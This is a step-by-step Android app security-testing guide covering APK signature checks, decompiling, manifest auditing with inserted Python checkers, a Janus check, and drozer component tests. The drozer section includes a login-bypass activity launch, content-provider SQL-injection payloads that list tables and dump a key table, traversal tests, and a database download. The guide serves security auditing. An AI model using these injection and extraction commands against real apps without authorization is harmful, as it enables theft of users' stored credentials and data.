
1. Client program security test

1. Check the APK information

java -jar GetApkInfo.jar tfkj.apk


2. Digital signature check

"C:\Program Files\Java\jdk1.8.0_111\bin\jarsigner.exe" -verify "C:\Users\bk\Desktop\Tianfu Technology Cloud APP\Tianfu Technology Cloud Service Platform\Tianfu Technology Cloud Service Platform.apk"


"C:\Program Files\Java\jdk1.8.0_111\bin\jarsigner.exe" -verify "C:\Users\bk\Desktop\Tianfu Technology Cloud APP\Tianfu Technology Cloud Service Platform\Tianfu Technology Cloud Service Platform.apk" -verbose -certs


The developer's certificate does not follow the standard subject fields, so the developer's identity information cannot be determined. The certificate (CERT.RSA, taken from the META-INF directory of the unzipped APK) can be printed with:

keytool.exe -printcert -file .\CERT.RSA


3. Decompile check

View the APP hardening (packer) type with ApkScan.jar


Decompiling the APK to Java source code:

Treat the apk as a zip archive and decompress it to get the classes.dex file


Copy the unzipped classes.dex file to the dex2jar tool folder


Execute the command: d2j-dex2jar classes.dex


After execution, the decompiled classes-dex2jar.jar file is obtained.


Open the classes-dex2jar.jar file with jd-gui.exe or luyten-0.5.4; the recovered source code is obfuscated by 360 security hardening.


Decompiling the APK to Smali:

java -jar [apktool_2.3.4.jar] d -f [apk path] -o [output directory]

java -jar apktool_2.3.3.jar d [-s] -f "C:\Users\bk\Desktop\Tianfu Technology Cloud APP\Tianfu Technology Cloud Service Platform.apk" -o tfkj
// For apps that cannot be decompiled (the Taobao app, for example), -s decodes only the xml resource files and leaves classes.dex as it is

java -jar apktool_2.3.3.jar d -f "C:\Users\bk\Desktop\Tianfu Technology Cloud APP\Tianfu Technology Cloud Service Platform.apk" -o tfkj


or:

apktool.bat d "Tianfu Technology Cloud Service Platform.apk"


4. Check the AndroidManifest.xml file

java -jar AXMLPrinter2.jar AndroidManifest.xml > AndroidManifest.txt

or

java -jar APKParser.jar "Tianfu Technology Cloud Service Platform.apk" AndroidManifest.txt


1. Application data backup enabled:

allowBackup (backup permission): true carries a risk of backup data leakage (defaults to true if not configured)


2. Unsafe debug mode enabled:

debuggable attribute: true poses a risk of application information tampering and leakage (defaults to false if not configured)

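As an added example (not from the original post), a small Python audit of a decoded AndroidManifest.xml that applies the two checks above and also lists the exported components, i.e. the component attack surface. The sample manifest is constructed, and the exported rule is the classic pre-Android-12 one (exported="true", or an intent-filter with exported unset).

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

def attr(elem, name, default=None):
    """Read an android:-namespaced attribute from a manifest element."""
    return elem.get("{%s}%s" % (ANDROID_NS, name), default)

def audit_manifest(xml_text):
    """Return the allowBackup/debuggable risk flags and the list of exported components."""
    app = ET.fromstring(xml_text).find("application")
    findings = {
        # allowBackup defaults to true when absent, so an unset attribute is also a finding
        "allowBackup": attr(app, "allowBackup", "true").lower() == "true",
        # debuggable defaults to false when absent
        "debuggable": attr(app, "debuggable", "false").lower() == "true",
        "exported": [],   # entries are (tag, name, is_launcher)
    }
    for tag in ("activity", "service", "receiver", "provider"):
        for comp in app.iter(tag):
            exported = attr(comp, "exported")
            has_filter = comp.find("intent-filter") is not None
            # Classic rule (pre-Android 12): exported="true", or an intent-filter with exported unset
            if exported == "true" or (exported is None and has_filter):
                launcher = any(attr(a, "name") == "android.intent.action.MAIN"
                               for a in comp.iter("action"))
                findings["exported"].append((tag, attr(comp, "name"), launcher))
    return findings

# Constructed sample: allowBackup unset, debuggable on, one launcher activity, one activity
# exposed only through its intent-filter, one explicitly private activity, one exported provider.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.app">
  <application android:debuggable="true">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".PWList">
      <intent-filter><action android:name="com.example.app.VIEW"/></intent-filter>
    </activity>
    <activity android:name=".Settings" android:exported="false"/>
    <provider android:name=".DBProvider" android:authorities="com.example.app.provider" android:exported="true"/>
  </application>
</manifest>"""

if __name__ == "__main__":
    for key, value in audit_manifest(SAMPLE_MANIFEST).items():
        print(key, value)
```

Any exported entry other than the launcher activity is the component exposure the drozer checks below look for, and is worth reviewing against the app's actual needs.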

5. Check for the Janus vulnerability

(1) Janus vulnerability: an attacker can modify the APP without affecting its original signature, and the tampered APP can still be installed and run. V1 and V2 signatures should be used together.
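An added Python check (not part of the original post) that reports which signing schemes an APK carries, by looking for the v1 signature block file in META-INF and parsing the APK Signing Block that scheme v2/v3 places just before the zip central directory; an APK with only a v1 signature is the case Janus targets. The APK bytes are constructed inside the block with a placeholder v2 entry, so it runs offline.

```python
import io, struct, zipfile

SIG_MAGIC = b"APK Sig Block 42"            # trailer of the APK Signing Block (scheme v2 and later)
PAIR_IDS = {0x7109871A: "v2", 0xF05368C0: "v3"}   # ID-value pair IDs of signature scheme v2 / v3

def _central_dir_offset(data):
    """Return (offset of the end-of-central-directory record, offset of the central directory)."""
    eocd = data.rindex(b"PK\x05\x06")      # EOCD signature; ValueError if this is not a zip
    return eocd, struct.unpack_from("<I", data, eocd + 16)[0]

def signature_schemes(apk):
    """Report the signing schemes an APK carries, e.g. {'v1'} or {'v1', 'v2'}."""
    schemes = set()
    with zipfile.ZipFile(io.BytesIO(apk)) as zf:     # v1: JAR signature block file in META-INF
        if any(n.startswith("META-INF/") and n.upper().endswith((".RSA", ".DSA", ".EC"))
               for n in zf.namelist()):
            schemes.add("v1")
    _, cd = _central_dir_offset(apk)
    if cd >= 24 and apk[cd - 16:cd] == SIG_MAGIC:   # v2+: signing block sits right before the CD
        size = struct.unpack_from("<Q", apk, cd - 24)[0]
        pos, end = cd - size, cd - 24               # first ID-value pair .. trailing size field
        while pos + 12 <= end:
            length, pair_id = struct.unpack_from("<QI", apk, pos)
            if pair_id in PAIR_IDS:
                schemes.add(PAIR_IDS[pair_id])
            pos += 8 + length
    return schemes

def janus_exposed(apk):
    """True when only a v1 signature is present, the situation Janus abuses."""
    s = signature_schemes(apk)
    return "v1" in s and not ({"v2", "v3"} & s)

def constructed_apk(v1=True, v2=False):
    """Build a minimal constructed APK; the v2 block is a dummy placeholder, not a real signature."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("classes.dex", b"dex\n035\0placeholder")
        if v1:
            zf.writestr("META-INF/CERT.RSA", b"\x30\x82placeholder")
    data = buf.getvalue()
    if v2:
        eocd, cd = _central_dir_offset(data)
        pair = struct.pack("<QI", 8, 0x7109871A) + b"\0\0\0\0"   # one dummy v2 pair
        size = len(pair) + 8 + len(SIG_MAGIC)
        block = struct.pack("<Q", size) + pair + struct.pack("<Q", size) + SIG_MAGIC
        eocd_rec = data[eocd:eocd + 16] + struct.pack("<I", cd + len(block)) + data[eocd + 20:]
        data = data[:cd] + block + data[cd:eocd] + eocd_rec   # insert block, fix CD offset
    return data
```

For a real APK, read the file bytes and call signature_schemes on them; apksigner verify --verbose reports the same scheme information.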

6. Application integrity check

Decompile the APK and rename one of its image files to test.png


Rebuild the apk package with the following command:

java -jar apktool.jar b -f <folder to be packaged> -o <output apk path>


or

apktool.bat b "Tianfu Technology Cloud Service Platform"


Under the Tianfu Technology Cloud folder you will find two new folders: build and dist (the packaged APK file is stored in dist)

Re-sign the APK with the following command:

java -jar signapk.jar testkey.x509.pem testkey.pk8 <apk to be signed> <signed apk output path>


Then reinstall the apk; if the tampered package installs, the application does not verify its own file integrity

2. Component security test

1. Basic information query

(1) List the installed packages:

run app.package.list

(2) Get the package name from the app name (e.g. drozer). Chinese app names cannot be listed this way; use java -jar GetApkInfo.jar to get the package name of the installed app instead.

Command: run app.package.list -f <package name>

run app.package.list -f drozer

(3) View the attack surface of the four major Android components:

Command: run app.package.attacksurface <package name>

run app.package.attacksurface com.zhuoyigou.dese

2. Activity (interface) component test

Activities are usually displayed as a visual user interaction interface.

(1) View exported activity component information:

Command: run app.activity.info -a <package name>

run app.activity.info -a com.zhuoyigou.dese

(2) Use app.activity.start for vulnerability testing:

Command: run app.activity.start --component <package name> <component name>

run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList   # bypasses the password and enters the system; the target is generally the main login window

Calling the exposed activity component: generally an app only exposes one program startup activity, and exposing any other activity is a component exposure. The following test found no component exposure vulnerabilities.

3. Content provider component test

Mainly used to implement data sharing between different applications (1), check the content provider component information command: run app.provider.info -a package name run app.provider.info -a com.zhuoyigou.dese 1049983-20211217131242548-2114912260.png (2), ContentProviders Data leakage URL command: run scanner.provider.finduris -a package name run scanner.provider.finduris -a com.zhuoyigou.dese 1049983-20211217131242952-505976919.png (3), obtain data of each Uri

Command: run app.provider.query The URL address that can be leaked --verticalrun app.provider.query content://com.zhuoyigou.dese.ipc.provider/--vertical 1049983-20211217131243276-1703090917.png (3), ContentProviders SQL injection command 1: run app.provider.query The URL address that can be connected --projection ''

Command 2: run app.provider.query URL address that can be connected --selection '''run app.provider.query content://com.zhuoyigou.dese.ipc.provider/--selection ''' 1049983-20211217131243626-1469344691.png 1049983-20211217131243937-488153965.png An error indicates that there is SQL injection (4) and all tables are listed

Command: run app.provider.query URL address that can be connected --projection '* FROM SQLITE_MASTER WHERE type='table';--'run app.provider.query content://com.zhuoyigou.dese.ipc.provider/--projection '* FROM SQLITE_MASTER WHERE type='table';--'The following figure shows three tables android_metadata, Passwords, and Key. From the name, it can be judged that android_metadata is a system-related table, and the other two may be related to password and other data.

安卓四大组件审计实验(drozer)

(5) Get the data in a table (such as Key):

Command: run app.provider.query URL address that can be connected --projection '* FROM table name;--'run app.provider.query content://com.zhuoyigou.dese.ipc.provider/--projection '* FROM Key;--' (6), detect SQL injection

Command: run scanner.provider.injection -a package name

run scanner.provider.injection -a com.zhuoyigou.dese 1049983-20211217131244758-1741595285.png (7), detection directory traversal command: run scanner.provider.traversal -a package name run scanner.provider.traversal -a com.zhuoyigou.dese 1049983-20211217131245151-1456269698.png (8) Read system file command: run app.provider.read URL address that can be connected run app.provider.read content://com.zhuoyigou.dese.ipc.provider/1049983-20211217131245503-305825827.png (9), download system file to local command: run app.provider.download Available download file address Local absolute path

run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/datab
